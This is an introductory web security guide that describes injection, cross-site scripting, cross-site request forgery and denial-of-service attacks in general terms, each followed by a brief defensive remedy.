Web Security

From a Security perspective for web applications, there are a lot of aspects to consider other than using a HTTPS communication. Using HTTPS provides transport layer security, but from an application security perspective, there is more to ponder over. There a lot of tools which perform tests (often known as Penetration tests) on the application, scan the code and provide possible vulnerabilities.

Open Web Application Security Project (in short referred to as OWASP) is a not-for-profit charitable organization focused on improving the security of software. They provide a list of common vulnerabilities and possible solutions for each.

Following is a list of some of the common attacks which needs to be generally considered.

1. Injection Attacks

Injection attacks involve modifying the input to an application in such a manner that the input itself could be used to perform malicious activity on the system. SQL Injection attack for instance includes modifying the input to embed SQL queries into the input which either gather sensitive information or perform harmful operations like deleting data, dropping tables/databases etc. JSON injection attacks also involve modifying the JSON to perform malicious queries on JSON based databases.

Illustration:

A simple SQL injection attack could be tried by modifying the input as below:

Solution:

Solution to injection attacks involve sanitizing the input against specific patterns and also avoid using the input to concatenate and create queries.

2. XSS Attacks

Also known as Cross Site Scripting attacks, in this type of attack, the attacker exploits the vulnerability of an application which just renders all the inputs on its web pages without sanitizing it. For eg, an attacker would provide a malicious script as his/her profile input to a website (say social networking site) and lets say the website redisplays this input on its website without sanitizing it. So, when another user visits the attacker’s profile, the script is rendered by the website and the script is run by the browser on the user’s machine. This script could steal sensitive user’s information and transfer it to the attacker’s site.

Solution:

Solution to XSS attacks involve sanitizing the input by validating against white listed set of characters and validating against script inputs.

3. XSRF Attacks

Also known as Cross Site Request Forgery attacks, in this type of attack, the attacker tricks the users to perform malicious operations on a site without the user’s knowledge. The malicious operation may or may not benefit the attacker, but nevertheless could harm or damage the user’s reputation.

For eg, Let’s say a user is logged in to a shopping cart application. An attacker would show some deals related to the shopping cart on his own website and trick the user to click on his website link. When the user clicks on the attackers website, the attackers website would run the same javascript code (form submission) which is actually present in the shopping cart application, but with malicious values. Since the user is already logged in, probably in another tab of the browser, the session would be shared and the attackers form submission could succeed. The attacker could possibly place a new order or change the delivery address and update it to his address etc.

Solution:

Solution to XSRF attack involve embedding a time limited server side random token or some form of signature in the web pages which would be submitted along with every request and validated against forged submissions.

4. Denial of Service Attacks

Denial of Service attacks (in short DOS attack), involves pumping a server with a huge of number of requests (which are automated), till the server gets overloaded and goes down. Another variant of this known as Distributed Denial of Service attack (DDOS), involves pumping of requests originating from different distributed attack servers (with unique IP addresses), making it hard for the vulnerable server to identify and block the attack requests.

In a cloud based environment, denial of service attacks might lead to scaling of infrastructure (if it is configured for auto scaling) and could incur huge financial losses for organizations.

Solution:

There are commercial softwares available which identify and neutralize DOS attacks.

results matching ""

    No results matching ""